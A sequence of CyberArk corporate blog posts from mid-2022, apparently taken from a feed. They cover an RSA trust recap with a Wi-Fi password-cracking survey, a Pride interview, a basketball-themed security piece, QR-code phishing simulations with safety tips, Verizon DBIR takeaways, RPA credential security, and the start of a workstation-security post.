Members of our CyberArk team joined 26,000 attendees online and in San Francisco as the Moscone Center once again opened its doors for the 31st annual cybersecurity conference. Reunited in person at last, there was much ground to cover. Yet every hard-hitting issue ultimately came down to trust. That same week, our CyberArk Labs team set out to explore a possible link between trust and consumer cybersecurity behaviors – but more on that in a minute. First, here are some key trust takeaways from RSA.

Trust Takeaways from RSA Conference 2022

Society’s ever-increasing reliance on technology continues to push digital advancements further and faster. Each new day brings another 2.5 quintillion bytes of data and equally as many new opportunities for cyber attacks that can expose sensitive data, breach confidentiality and damage reputations and bottom lines.

“We are more vulnerable because of the dizzying pace we are adopting technology, engaging in tech transformation and adding devices without prioritizing security,” noted Niloofar Razi Howe, an RSA keynote moderator and senior operating partner at Energy Impact Partners. This pattern of “innovate now, secure later” not only drives up cybersecurity debt and puts organizations at greater risk, but it also contributes to a broader cycle of public distrust.

Consumers are more skeptical than ever about how their sensitive financial, genetic, health and location data are used, and privacy concerns continue to grow with every headline-grabbing cyber attack. As U.S. Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly noted in the “Cybersecurity as a National Security Imperative” panel, “Building trust is hard, and breaking trust is easy.” During the keynote “Building Trust in a Zero-Trust World to Confront Tomorrow’s Cyber Threats,” Howe pointed to the 2022 Edelman Trust Barometer, a global study of more than 36,000 people that found nearly six in every 10 respondents said “distrust” is now their default state.

Diminishing consumer trust is also fueled heavily by information disorder – the topic of the final keynote, featuring former CISA director Chris Krebs, Color of Change President Rashad Robinson and journalist Katie Couric. As the “slope of discord” seemingly grows steeper by the day, the panel sounded the alarm on how malicious cyber actors can use disinformation and misinformation to their advantage, emphasizing the need to ensure “truth actually has a fighting chance,” to quote Robinson.

The previously mentioned Edelman study shows that people have particularly high expectations of businesses in breaking this cycle of distrust. Numerous speakers throughout the week urged that meeting these expectations – while preserving trust across highly interconnected IT environments and supply chains – means businesses must transform to stay ahead of cyber threats.

Technology plays a big part in these transformation efforts. For instance, Jane Horvath, chief privacy officer at Apple, spoke of privacy-enhancing technologies that focus on data not tied to individual identities, while advancements in telemetry, automation and AI were widely touted as critical to combating ransomware at scale. But don’t confuse technology with broader security approaches, cautioned speakers, including national cyber director Chris Inglis, who made a point of defining Zero Trust as a “digital architecture compromised of technology, of people and practice doctrine.”

Even with the best frameworks and defense-in-depth technology layers in place, businesses can’t shoulder the burden of trust on their own. In her RSA talks and in an op-ed published the same week, Easterly stressed that “cybersecurity requires a whole-of-government and whole-of-society effort.”

Could Trust Impact Consumer Cybersecurity Behaviors?

CyberArk Labs cracked Wi-Fi networks across San Francisco to find out. 

Our CyberArk Labs team wanted to better understand if overarching trust issues have influenced consumers’ home Wi-Fi cybersecurity practices. With hybrid work models here for good, unsecured home networks pose serious risks as threat actors target them to steal bandwidth, launch man-in-the-middle (MitM) and other attacks and even pivot into corporate networks.

So while the world talked security at the RSA Conference, our own CyberArk Labs technical evangelist Andy Thompson took to the hilly streets of San Francisco. The plan was this: “war-drive” around densely populated areas to test wireless network resiliency in the U.S. tech capital.

Historically, cracking Wi-Fi passwords is a time-intensive process requiring threat actors (and threat researchers) to intercept a four-way “handshake” as a network connection is established in real time. But thanks to the work of a researcher known as “atom,” there’s a much easier way to pinpoint weak passwords – and it can be done at any time. This PMKID hash harvesting method simply requires the person to be in the vicinity of a home or business router. (Explore all the technical specifics on the CyberArk Threat Research Blog.) Behind the wheel of a rental car, armed with simple, readily available Wi-Fi sniffing equipment – a laptop running Linux and a $50 wireless network interface card – Thompson set out to replicate similar experiments conducted by CyberArk Labs in Tel Aviv and Dallas, Texas.

Password Cracking

Figure 1. Readily available Wi-Fi sniffing equipment

Twenty hours and countless cups of coffee later, Thompson had collected 5,000 Wi-Fi network hashes, which were sent through CyberArk Labs’ monster brute-force cracking rig (8 x QUADRO RTX 8000 48GB GPUs) that can guess commonly used and weak passwords in seconds or less. It’s important to note that at no point were actual passwords captured or used during this research project.

And the results? Just 6% of the sniffed Wi-Fi networks were crackable in the San Francisco Bay area, compared to 9% in Dallas and a whopping 70% in Tel Aviv. This makes San Francisco the most secure city in our war-driving journey to date and perhaps signals a broader shift in consumer cybersecurity habits and heightened awareness around data protection responsibilities.

San Francisco City View

Figure 2. Wi-Fi cracking through the hills of San Francisco 

Protect Your Wi-Fi Network This World Wi-Fi Day (and Every Day)

With World Wi-Fi Day on June 20, we encourage every online user to consider how they secure this household technology – especially now that it’s used so interchangeably for personal and work life. Because Wi-Fi sniffing activities are undetectable, security safeguards such as two-factor authentication won’t stop them. Instead, it’s important to follow these steps to protect yourself and your employer from Wi-Fi cracking attempts:

  • Change the default username and password of your router if you haven’t already
  • Update your router firmware and always keep patches up to date
  • Upgrade to the WPA3 encryption protocol to help strengthen protections against brute force password cracking attempts
  • And most important, use strong passwords that are complex, unique and changed (or rotated) frequently

Protecting our digital identities is a shared responsibility. To echo Director Easterly, every one of us – as individuals, organizations and government entities – must put and keep our “shields up” to strengthen collective defense and trust.

Trust … it’s something we’re talking about a lot these days. Listen to the Trust Issues podcast on Spotify, Apple Podcasts, Amazon Podcasts and Google Podcasts – or wherever you get your podcasts.

]]>
Celebrating Our LGBTQIA2S++ Community With Pride https://www.cyberark.com/blog/celebrating-our-lgbtqia2s-community-with-pride/ Fri, 10 Jun 2022 15:58:31 +0000 https://www.cyberark.com/?p=131832 Celebrating Our LGBTQIA2S++ Community With Pride

This Pride Month, we celebrate the diverse identities and tremendous contributions of LGBTQIA2S++ people around the world and within our CyberArk community. But nurturing an inclusive, supportive workplace isn’t something that ends on June 30 — it must be woven into every experience and interaction all year round. Sharing their perspectives are Ani King, CyberArk enterprise support manager, premium; Brian Nienhouse, CyberArk Privilege Cloud team lead; and Sam Emmitt, CyberArk support engineer, premium.

These three CyberArk diversity, equity and inclusion (DEI) champions have played instrumental roles in establishing our CYBR Pride employee resource group (ERG) and are helping to grow this global community of LGBTQIA2S++ and ally members. Our conversation centers on findings from a recent CYBR Pride survey that highlighted members’ specific areas of interest and collective learning opportunities.

Respondents indicated that having a dedicated LGBTQIA2S++ community network at work best supports “a safe space to share experiences” and “promotion of diversity.” As founding members of CYBR Pride, why is this initiative important to you?

“Visible support is critical at work,” says King. “An ERG signals to people that they can have expectations for support, instead of just wondering.” They emphasize the need for established practices that help ensure every individual feels safe and supported in the workplace. “Without official policy, visible support and budget for meaningful change, changes are likely to be cobbled together or led in silos by specific managers or teams — which means they aren’t guaranteed if someone moves to another department, location, or even from day to day,” King continues.

Adds Nienhouse, “When leadership is invested in an ERG like CYBR Pride, it sends a message to the company that we are truly valued and celebrated, increasing the sense of community and belonging — the top driver of employee engagement, according to industry research.”

Many survey respondents identifying as allies said they want to do more to show their support. What advice can you share about ways to show allyship in the office and in the community?

Here, King, Nienhouse and Emmitt offer several helpful suggestions, which are summarized below:

  • Do some research. Our panel suggests visiting the Human Rights Campaign, PFLAG, the Transgender Law Center and The Okra Project. And for additional reading, consider NPR’s list of books to celebrate Pride Month and this glossary of helpful acronyms.
  • Use people’s pronouns. Using inclusive language consistently is a small thing that adds up to a big thing in support of our shared humanity.
  • Share your own pronouns during meeting introductions and in your email signature to help normalize a culture of inclusive communication and respect for all.
  • Make a visible statement. Place a decal or magnet on your laptop, office door or car to indicate your allyship.
  • Help educate others. Educating others on why LGBTQIA2S++ people matter can be a lot to shoulder. When allies make it a point to help share that load by verbally and visibly supporting them and educating others, it helps.
  • Be receptive to feedback. Consider and value the lived experiences of your LGBTQIA2S++ colleagues — accept feedback and ask for ways you can improve and show up as an ally.
  • Support LGBTQIA2S++ businesses during Pride Month and throughout the year. If there is a local LGBTQ community center or support center nearby, please support it. Funding is always an issue for these organizations, and they may be the only lifeline available to people in your area.
  • Don’t worry about messing up. Becoming a strong advocate for the community takes time. If you get a pronoun wrong, don’t sweat it, just correct yourself. Or, if someone corrects you, thank them and plan to do better next time.

Transgender awareness was a particular area of interest for our survey respondents. What are some ways colleagues can deepen their understanding and show their support?

“Make sure the person transitioning is being called by their preferred name,” says Emmitt. “Managers can help by communicating exactly when a team member’s new names or pronouns should be used to help eliminate confusion and mistakes.” Also look for opportunities to check in and be there for your co-worker, they continue. “There may be new activities they’ve been afraid to do alone, like shopping for new clothes. See if having someone there with them could help reduce that anxiety.”

Another way to demonstrate allyship is to initiate conversations about how you’ve unlearned negative thoughts or behaviors, notes Nienhouse. “Conversations that come from a place of genuine care tend to be most effective.” They offer this example: “Hey, I saw you were a little nervous around Sam after you learned he is trans. I had a hard time knowing what to do with that information too, but all that’s important is that you and Sam respect each other. You don’t have to know or understand everything about that part of his identity.”

Here, Nienhouse shares from personal experience. “I transitioned on the job at CyberArk and felt nothing but support and encouragement from my manager and team. Everyone responded positively and immediately switched up my pronouns. I was always treated with dignity and respect, and my experience as a transitioning employee made me feel seen and appreciated.”

Small day-to-day interactions also provide opportunities to reinforce support for LGBTQIA2S++ colleagues — and they go a long way, notes King.

“From my first interview to present, my boss has been consistent about using my pronouns in every conversation. Knowing that I’m supported without question makes a difference in how I feel about work in general,” says King.

Research shows that a company’s ability to compete for talent is directly linked to its DEI focus. For members of the LGBTQIA2S++ community seeking new job opportunities of any kind, what questions should they be asking of potential employers?

Our panel offers the following suggested questions to ask:

  • Are you aware of any visibly out people in the company? And how does the company support them in their gender and identity presentation?
  • How does your company plan to support transitioning individuals in the future, should that be a need?
  • How do you visibly show support for your employees at a company level?
  • Do you have an ERG in place, and if not, is one in progress?
  • How do you visibly show support for people outside of the company, so that prospective employees are aware that it may be a safe place for them to work?
  • Are employee benefits inclusive of LGBTQIA2S++ employees’ needs, and do they cover things such as gender confirmation procedures?

Closing Thoughts

“Progress is often marked by big, visible events throughout history and celebrated during prominent events such as Pride Month. But it’s important to remember that behind every monumental moment, there are things we can all do by the minute, hour and day to drive meaningful change,” says King.

“And if you’re wondering if it’s too late to get involved, please know that it’s never too late,” encourages Emmitt.

 

 

 

]]>
What the 2022 NBA Finals Teaches Us About All-Star Cybersecurity https://www.cyberark.com/blog/what-the-2022-nba-finals-teaches-us-about-all-star-cybersecurity/ Tue, 07 Jun 2022 13:00:07 +0000 https://www.cyberark.com/?p=131750 What the 2022 NBA Finals Teaches Us About All-Star Cybersecurity

It’s NBA Finals time in the United States, and our global CyberArk team — from our die-hard Boston Celtics and Golden State Warriors fans to our threat researchers –by day, ballers –by night in Israel — is here for it. With Game 3 set to tip off on the Boston parquet Wednesday night, here’s a look at how the cross-country battle between the Celtics and the Warriors is feeling a lot like the war being waged on the identity battleground in cyberspace:

Long-range attacks are changing the game. The Golden State Warriors’ long-range shooters have revolutionized the game of basketball — no one more so than Steph Curry, who consistently makes “unearthly shots” from up to 30 feet away. Cyber attackers are also mastering a similar long-range approach to infiltrate organizations from afar — far beyond network walls. Intelligent identity security controls such as single sign-on (SSO) and multi-factor authentication (MFA) for remote workers and privileged access controls for external vendors are key to blocking these audacious long-range attempts.

Not every shot can (or should) be a three-pointer. Many baskets come on good shot selection. And often, scoring requires multiple passes, with the Celtics’  Jayson Tatum showing us how it’s done. But on the flipside, every pass is an opportunity for the other team. Looking for ways to limit this lateral movement — down the court or deeper into an IT environment — can limit offensive opportunities.

Protecting in the paint is the “heart” of your enterprise. Elite defense around the rim is one of the ways good teams become great. By defending the most important thing (on the court and in the enterprise, respectively), the Celtics’ Robert Williams III and privileged access management (PAM) have our vote for Defensive Players of the Year.

Don’t discount under-the-radar risks. One of the best parts about basketball — especially during the late-round playoffs and into the finals — is that teams constantly evolve, meaning anything can happen. Cybersecurity teams can’t just defend against attacks they’ve already seen or underestimate Payton Pritchard-type threats that could have the X factor that swings the whole series.

Defense (in depth) wins championships. The Athletic’s Jared Weiss writes, “The Celtics made the NBA Finals not because they could stop everything from happening by switching up on every play, but because it was able to invite the opponent into what was supposed to be a comfort zone.” In basketball and in cybersecurity, teams need a solid, layered defense with multiple players working together in unison to detect and respond to threats, close up gaps and sometimes even lull attackers into a false sense of security before turning up the heat.

Planning for turnovers is part of the playbook. Team playbooks outline detailed plans that players follow to help keep the ball in their possession. But these playbooks also account for less-than-ideal scenarios — and outline plays for when things go sideways. By proactively assuming breach — and testing their plays routinely — cybersecurity teams will be better equipped to regain possession, minimize damage and restore trust quickly after an incident.

Dream teams are made up of players with diverse yet complementary skills. You need the Michael Jordans and Magic Johnsons, of course, but you also need the Draymond Greens and Derrick Whites — players willing to put in the work, roll up their sleeves and get the job done, whether that means passing, rebounding, defending or scoring. Same goes for cybersecurity teams: Diverse skillsets and backgrounds make them stronger and more effective. And as the cybersecurity skills gap continues to widen, investing in an organizational dream team’s collective growth, well-being and success must be a priority.

And finally… unlike basketball, cybersecurity is a game that never ends. It requires extreme endurance, a powerful toolset and an endless supply of grit and ingenuity, just like basketball. Setbacks cannot distract from the mission or the road ahead. In the words of Klay Thompson after the Warriors’ Game 1 defeat last week, “It’s the first to four, not the first to one. We all have been through hard situations like this … and the best part about this is we have another opportunity.”

 

]]>
Step Away From the QR Code and Read These 7 Safety Tips https://www.cyberark.com/blog/step-away-from-the-qr-code-and-read-these-7-safety-tips/ Thu, 02 Jun 2022 11:00:00 +0000 https://www.cyberark.com/?p=131535 QR Code Cyber Safety

This post is authored by Len Noe, a technical evangelist and white hat hacker at CyberArk. You can listen to his “Trust Issues” podcast episode on QR codes here and his episode on transhumanism and charting the final cybersecurity frontier here

If it seems like there’s a QR code on everything these days, you’re right.

In the contactless era, these little black and white grids emerged from relative obscurity to replace everything from restaurant menus to store coupons to subway station ads. They’ve become the defacto business card, digital event leave behind and virtual payment option. Governments around the world have even embraced them to facilitate contact tracing and vaccination status verification.

QR codes are accessible, easy to produce and, seemingly, here to stay. They’re also a perfect way for cyber criminals to snag your personal information. Here’s what you need to know before scanning that code with your smartphone.

What is a QR Code?

Short for quick response codes, QR codes are a type of two-dimensional barcode that contain data, often for a locator, identifier or tracker. They can be easily read by a smartphone or other camera-equipped device and converted into useful information for the end-user, such as a URL for a website or an application. QR codes were first invented in 1994 by an automotive company to track car components, but their ease of use and greater storage capacity — up to 2,500 characters compared to a barcode’s 43 — soon made them popular in other industries. But it wasn’t until after COVID-19 struck that QR codes really took hold, particularly in the United States where they were historically viewed as a novelty. Then all of a sudden, they were everywhere.

Before we go further, it’s important to note that QR codes can be used for numerous reasons and in numerous ways. Today, the most prevalent consumer use case is for marketing: QR codes found in advertisements, on business cards or on restaurant tables, as examples. When clicked, these QR codes are meant to redirect a person to a URL containing information about a product, a person applying for a job, a digital dinner menu, etc. My research and this accompanying blog post focus exclusively on these types of “URL redirect” QR codes. While I don’t cover them here, QR codes can also be used for more sophisticated purposes, for instance, as tokens or factors in a multifactor authentication flow. Because token QR codes are linked to a specific, corresponding technology and only work on registered devices, they are harmless to scan and virtually useless from an attacker perspective.

3 Attack Simulations on Rising QR Code Risks

More than two years of pandemic-fueled cyber crime has made many consumers more cautious about their digital activity. Emails, calls and even texts are scrutinized closely, forcing many attackers to step up their phishing games. And yet, QR codes haven’t really registered as potentially dangerous, and most people still scan them without a second thought.

Case in point: In January 2022, the FBI issued a warning that cyber attackers were tampering with legitimate QR codes to redirect victims to malicious sites that steal login and financial information. Within weeks of the warning, during the biggest football game of the year, more than 20 million people scanned a single mysterious QR code in a commercial for an unnamed company in the span of one minute.

I’m here to tell you that is bad news, and show why through three attack simulations:

QR Code Attack Vector 1: Job Seekers and Form Fillers Everywhere, Beware

To start, I created a fake paper ad for an imaginary job fair, just like the ones seen on job boards in your local coffee shop.

Fake paper ad with QR code

Figure 1: Fake job fair ad containing malicious QR code 

It contains the event details and a legitimate-looking QR code that takes the user to a job finder site where they can get a head start on submitting their job application.

QR code leads to false careers site

Figure 2: QR code leads to a false careers page

Filling out the required personal information is quick and easy… except, it can all go straight to an attacker’s webmail.

Job applicant info

Figure 3: Job applicant’s personal data delivered to cyber attacker’s email inbox

Think of all the times you’ve filled out a form or survey online — whether it originated from a QR code, social media ad or elsewhere. It’s very hard to know where your data is headed to on the back end. So proceed with great caution.

QR Code Attack Vector 2: Vax Pass or Phone Takeover?

For an attacker, “ultimate access” is the ability to interact directly with your device. This can be done via a reverse shell attack, or “connect-back shell,” which takes advantage of the target system’s vulnerabilities to initiate a shell session and gain access to the victim’s device. In this attack example, I used the MetaSploit Meterpreter Shell to spoof the COVID Certificate application used abroad.

By scanning a QR code, the victim goes to what appears to be the Google Play Store and installs the app. Except it’s not Google Play…

App Store COVID-19 app

Figure 4: Spoofed COVID Certificate app 

After the user initiates the install, the attacker now has a reverse connection into the device.

QR code reverse connection

Figure 5: Attacker establishes reverse connection 

With this type of initial access, the attacker could potentially set up persistence and then come and go as they please to do anything from dumping call and SMS logs to taking pictures with the camera. In other words, anything you can do on your phone, they could do too.

Creepy? Absolutely. Easy for an attacker to execute? Also yes.

QR Code Attack Vector 3: The QR Code Phishing Attack You Never Saw Coming

When you sit down at a restaurant and see a QR code on the table, chances are you’ll scan it without a second thought, expecting it to take you to the menu. But what if that same QR code was embedded in an email coming from someone you don’t know? Would you be as quick to scan it — or would it give you pause?

Attackers are betting you won’t be as careful. And too often, they’re right. Here’s a side-by-side comparison of two QR codes. Can you tell the difference?

2 QR codes

Figure 6: Two QR codes

One will take you to a restaurant website’s menu, the other will take you somewhere else entirely. As I’ve done here, attackers can clone a legitimate login QR code and turn it into a phishing website that looks almost identical to the real one — except that the URL is different.

Fake menu from QR code

Figure 7:  Fake menu and phishing website

When the victim scans the QR code, they are redirected to the attacker’s web server where a malicious website utilizing the malicious BeeF suite is running, giving the attacker control of the victim’s device. The attacker now has access to multiple attack vectors and numerous ways to exfiltrate the user’s data, such as their current GPS location, device type, SIM card data and other sensitive information.

With some additional social engineering tricks, the attacker could take things even further. By using on-device spear-phishing, they could spoof the victim’s on-device password keeper. After the victim inputs their username and password, the attacker could gain access to the user’s full password safe. Game over.

Spoofing an on-device password keeper

Figure 8: Spoofed on-device password keeper requests victim’s username and password

QR Code Attacks are Increasing. Here are 7 Ways to Protect Yourself

Last fall, the private key used to sign the European Union’s Green Pass vaccine passports was reportedly leaked or forged. Within days, fake QR code-laden passes signed with the stolen key were up for sale on the Dark Web. In China, scammers have been caught placing fake parking tickets — complete with QR codes for easy mobile fine payment — on parked cars. In the Netherlands, a QR code scam exploited a legitimate feature within a mobile banking application to swindle the bank’s customers, while in Germany, phony emails containing QR codes have lured eBanking customers to malicious websites under the guise of reviewing privacy policy updates to their accounts. And in Texas, criminals hit the streets, pasting stickers of malicious QR codes on to city parking meters and tricking residents into entering credit card details into a fake phishing site.

QR code attacks are happening everywhere with alarming frequency. Here are seven ways to protect yourself:

1. Don’t scan it! If anything feels off, don’t scan the QR code. Just go to the actual website directly. Any legitimate QR code should have an associated URL under it, giving users the option to navigate there directly. If it’s missing, beware.

2. Slow down. Before you scan any QR code, ask yourself: Do I know who put the QR code there? Do I trust that it hasn’t been tampered with? Does it even make sense to use a QR code in this situation?

3. Inspect QR code URLs closely. After scanning the QR code, check out the URL it directs you to before proceeding. Does it match the organization associated with the QR code? Does it seem suspicious, or include strange misspellings or typos? For instance, in the Texas parking meter scams, part of the URL used was “passportlab.xyz” — clearly not an official city government website. You can also do a quick web search of the URL to confirm that the QR code is legitimate.

4. Look for signs of physical tampering. This is especially important in places where QR codes are commonly used, such as restaurants. If you spot a QR code sticker adhered to a page over another code, be very skeptical.

5. Never download apps from QR codes. Bad actors can clone and spoof websites easily. Always go to the official app market for your device’s OS and download your apps from there.

6. Don’t make electronic payments via QR codes. Use the native app or direct a browser to the official domain and log in there.

7. Turn on multi-factor authentication (MFA). This will help protect your sensitive accounts, such as banking, email and social media apps. With another authentication layer in place, a cyber criminal cannot access your data with just your login and password.

When it comes to QR codes, the best piece of advice is to always use common sense. If it was an email, would you click on it? QR codes are becoming one of attackers’ favorite phishing methods — and the same rules apply. Proceed with caution and apply the same security scrutiny as you would with anything in the digital realm.

Scan safe out there — or better yet, don’t scan at all!

To learn more, register for our live August 16, 2022 webinar, “QR Codes in a Post-Pandemic World.” 

 

]]>
2022 Verizon DBIR: 15 Years, 15 Takeaways https://www.cyberark.com/blog/2022-verizon-dbir-15-years-15-takeaways/ Wed, 01 Jun 2022 13:00:45 +0000 https://www.cyberark.com/?p=131526 2022 Verizon DBIR: 15 Years, 15 Takeaways

Since 2008, the Verizon Data Breach Investigations Report (DBIR) has provided the global cybersecurity community with valuable insights on the evolving threat landscape. Not only does the latest 2022 report dig deep into current trends, it also looks back over 15 years to show just how much has changed… and how some things, like identity compromise through credential theft, never do.

To commemorate 15 years, here are 15 takeaways and observations on the 2022 Verizon DBIR:

1. When it comes to credential theft, it’s Groundhog Day all over again. The use of stolen credentials was pervasive across the 23,896 security incidents and 5,212 confirmed breaches analyzed, and the first link in nearly 50% of attack chains. It’s a familiar story on repeat: As the 2009 DBIR noted years ago, “It is evident that many intrusions exploit the basic (mis)management of identity.”

2. And things only got worse from there. Since its 2017 analysis, the DBIR team has tracked an almost 30% increase in the use of stolen credentials. Today, credentials represent “one of the most tried-and-true methods to gain access to an organization” and are “the favorite data type of criminal actors because they are so useful for masquerading as legitimate users on the system,” noted the 2022 DBIR.

3. One thing that has changed dramatically is ransomware, which surged by 13% to 25% in one year — more than the past five years combined. Ransomware was present in almost 70% of all malware-related breaches, was one of the top tactics used by “capable threat actors” in system intrusions and supply chain attacks, and does not discriminate based on organization size.

4. Forty percent of all ransomware incidents involve desktop sharing software. With people working from everywhere, attackers found desktop sharing software such as remote desktop protocol (RDP) to be particularly useful — especially in launching ransomware attacks. Desktop sharing software was linked to 14% of all system intrusion incidents. “Unfortunately, if you can access the asset directly over the internet simply by entering the credentials, so can the criminals,” noted DBIR authors.

5. BUT… “Ransomware alone is simply a model of monetization of a compromised organization’s access that has become quite popular,” reminded the report authors. Reversing the ransomware rampage mostly comes down to blocking the most common paths to an organization’s estate, beginning with credential theft at the endpoint.

6. This year’s DBIR found 62% of system intrusion incidents came through an organization’s partner. In supply chain breaches, which the DBIR team classifies as a “sequence of one or more breaches chained together,” the use of stolen credentials was identified as a top action variety. Noted the DBIR team in its report announcement, “Compromising the right partner is a force multiplier for cyber criminals, and highlights the difficulties that many organizations face in securing their supply chain.” The findings corroborate those of the CyberArk 2022 Identity Security Threat Landscape Report, which found that 64% of security leaders admit an attack on their organization originating from a compromised software supplier could not be stopped.

7. While some sophisticated supply chain attacks involve many actions over lengthy periods of time, the 2022 DBIR found that a vast majority of attack chains (more than 75%) only include three steps. The most common were phishing, downloader and ransomware — likely made possible, in large part, to the surge in ransomware-as-a-service sold by highly organized criminal enterprises. Every step an attacker takes is an opportunity to get caught. So, report authors noted, “Our job as defenders is to lengthen that attack path.” In our CyberArk team’s view, following zero trust principles by implementing identity security controls such as multi-factor authentication (MFA) and privileged access management (PAM) can help minimize attackers’ movements, their access to sensitive systems and data, and ultimately, their chances of success.

8. Web application risks are the No. 1 attack vector… and 80% of these breaches can be attributed to, you guessed it, credential theft. No surprise here, since web apps are exposed to the internet and, in turn, to external attackers.

9. But what’s new is the addition of software updates to the list of top action vectors for web application attacks — coming in hot at 60%. With the landmark SolarWinds breach as their guide, attackers are increasingly distributing malware through software updates — and they’re targeting things like developer workstations, DevOps and automation tools that hold powerful privileges. In the words of the report authors, “One thing is certain, stolen creds and web apps go together like peanut butter and chocolate.”

10. When securing web applications, it’s important to consider privileged “insider” identities. Though the Verizon DBIR classifies them separately, it’s also important to consider how insider threats factor into the broader web application risk equation. According to CyberArk research, the average employee has access to more than 30 applications and accounts, and 52% of organizations’ workforces have access to sensitive corporate data. And 80% of organizations experienced employees misusing or abusing access to business applications in the past year — highlighting a widespread need for better visibility into user sessions and activities.

11. While we’re on the subject, are insider threat risks really that low? The 2022 Verizon DBIR found that an organization is about four times more likely to be attacked by an external actor than an insider. But take that with a grain of salt, as it’s likely more insider jobs go unreported and even undetected. A legitimate identity using legitimate credentials for the wrong reasons — especially someone with legitimate privileged access to sensitive resources — is hard to find unless you have ways to detect malicious or unusual behavior right away.

12. Based on the insider incidents analyzed in the Verizon DBIR, privilege misuse, defined as “the pattern where people use the legitimate access granted to them as employees,” is 2.5 times more likely to be accidental than malicious. But when it’s intentional, internal threat actors are most likely to go after personal data of customers, employees or partners, the report found. As in years past, healthcare remains the industry with the highest number of malicious internal actors, and 22% of privilege misuse-related breaches targeted medical data.

13. The report found that error is responsible for 13% of all breaches, with the bulk of them stemming from misconfigured cloud storage. Considering how many digital identities live in the digital stratosphere today, this isn’t surprising, but it raises a question: When does “human error” become “humanly impossible?” Keeping thousands or hundreds of thousands of permissions properly configured all the time isn’t something most IT teams can do manually, especially since securing access to and within cloud environments is a relatively new discipline. As cloud migrations continue, AI and automation will be key to curbing identity-centric security challenges.

14. Fifty-eight percent of mobile devices had at least one malicious URL clicked and 16% had at least one malware or riskware app installed. In the past few “contactless” years, people have become accustomed to using their phones for just about everything, from paying for goods to perusing restaurant menus. But remember, phishing is phishing — whether it’s a link in an email or a malicious QR code. And since “almost a fifth of phishing successes came from mobile devices, that should be good enough confirmation that it needs to be within your security estate,” cautioned report authors.

15. A whopping 82% of all analyzed breaches involved the human element when tallying up those due to human error, misuse of privilege (by legitimate identities) and social engineering. This highlights the need to approach cybersecurity holistically — not only emphasizing important technical security controls, but also people-centric initiatives. For instance, respondents in the CyberArk 2022 Identity Security Threat Landscape Report indicated cybersecurity awareness training was one of the top three most effective components of a defense-in-depth strategy to combat ransomware.

Read the entire 108-page 2022 Verizon DBIR to explore full findings, including industry- and region-specific attack patterns and trends. And to learn more about the role identity plays in almost every major cyberattack today, read our latest global research.

]]>
RPA and the Speed vs. Security Balancing Act https://www.cyberark.com/blog/rpa-and-the-speed-vs-security-balancing-act/ Tue, 24 May 2022 13:00:40 +0000 https://www.cyberark.com/?p=131185 RPA and the Speed vs. Security Balancing Act

Robotic process automation, or RPA for short, is one of those hefty technical terms that can be tough to explain without a lot of jargon. But at the highest level, RPA is all about using software to improve human experiences.

RPA automates repetitive tasks so employees can focus on meaningful work, while customers reap the benefits of superior products and services. In the healthcare field, for example, RPA is used to automate manual scheduling, billing and claims management processes so providers can spend more time with their patients.

But without a strong Identity Security framework in place, RPA can run counter to its core purpose, driving up cybersecurity debt and exposing the organization to risk. Development and deployment challenges only increase as RPA scales, evidenced by the 74% of organizations that say they’ve slowed RPA and bot deployments due to security concerns. Much like a tightrope walker navigating a line, unlocking the full value of RPA requires a careful balancing act between two extremes: security and speed.

RPA Risks and the Security Imperative

As with every digital initiative, RPA deployments create multitudes of new digital identities in the form of RPA bots. Each of these bots requires privileged credentials to access business-critical applications, resources and other sensitive systems to do their jobs — whether that’s data entry, reconciliation, data transfer, report generation or something else. And in the case of “unattended bots,” there’s no human interaction or supervision over this process, which can be risky. If attackers get their hands on these privileged credentials — as they so often try to do — they could reprogram bots for malicious purposes such as destroying data, shutting down operations, sabotaging systems, redirecting payments or distributing malware.

RPA and the Need for Speed

In some organizations, bot developers are on the IT team, but increasingly, “citizen developers” — non-IT employees using technology to make workflows more efficient for themselves and their teams — assume the role of handling automation and scaling RPA initiatives. These users aren’t necessarily focused on security or aware of how common security shortcuts can create potentially huge problems. Bot developers need an intuitive, automatic way to manage bot credentials — otherwise, speed will trump security nearly every time.

Striking the Right Balance as RPA Scales

Following these five steps can help bring the two seemingly conflicting priorities of security and speed into alignment:

1. Involve security from the start. In many cases, security teams don’t even know about RPA initiatives until they’re called in to approve them at the last minute, which can hold things up and create frustration on both ends. Involving security from the start of an RPA project to help establish security standards and get everyone on the same page will save time in the long run.

2. Examine existing bot controls. Review existing credential management policies to identify potential gaps: Where are credentials stored? Are parameters in place to help ensure passwords are unique and complex? How often are these credentials rotated? Are authentication layers in place for credential retrieval? Is there a way to monitor and audit credential use?

3. Eliminate excessive permissions. How data is handled is just as important as how it’s accessed. As a rule, bots should not be able to access other applications or databases outside of their required tasks. Take steps to review and understand what each individual bot can access and eliminate excessive permissions wherever possible.

4. Put a moratorium on hard-coded credentials. Embedding authentication data directly into source code expands the attack surface and can create major issues. For one, hard-coded credentials are difficult — if not impossible — to rotate, as this practice prevents passwords to critical systems from being changed without causing major disruptions to operations. Worse still, hard-coded credentials expose credentials when scripts are shared (including publicly when scripts are in code repositories). And when credentials are reused, attackers can use bots to move laterally and escalate privileges.

5. Look for every opportunity to automate. While straightforward, implementing the above best practices at scale is very difficult to do manually across thousands — or even hundreds of thousands — of bots. Automating credential management processes wherever possible will help remove much of the security burden on employees — whether they’re developing RPA bots or tasked with approving deployments. For example, by storing all credentials in a centralized repository, organizations can enforce fixed security standards for bots and applications, automatically create complex passwords and rotate them regularly, and remove hard-coded credentials from bots and secure them.

Establishing a secure, automated Identity Security framework can help ensure RPA initiatives do what they’re supposed to do: improve experiences by eliminating delays, simplifying deployments and addressing security issues — before you even know you have them.

]]>
6 Best Practices for Securing Employee Workstations Everywhere https://www.cyberark.com/blog/6-best-practices-for-securing-employee-workstations-everywhere/ Thu, 19 May 2022 13:00:45 +0000 https://www.cyberark.com/?p=131132 6 Best Practices for Securing Employee Workstations Everywhere

The future of work is “less about a place and more about people’s potential,” notes a recent Accenture study, which found that 63% of high-growth companies have already adopted “productivity anywhere.”

Organizations around the world are fast embracing this hybrid workforce model that puts employee workstations at the edge, far beyond the “walls” of the traditional corporate network. Nearly all our CyberArk Remediation Services team’s recent engagements reflect this reality: workstations are now one of the easiest ways for attackers to compromise identities, launch ransomware attacks, exploit privileged credentials and start moving toward sensitive IT systems and exfiltrate confidential data.

By the time incident response experts are engaged, attackers have proliferated throughout the environment. Many organizations believe that deploying endpoint security protections during a cyber attack is like putting storm windows on your house in the middle of a hurricane. Our remediation services engagements have consistently found that organizations can accelerate recovery efforts by implementing the following foundational Identity Security controls at the endpoint before an inevitable attack. These foundational controls include:

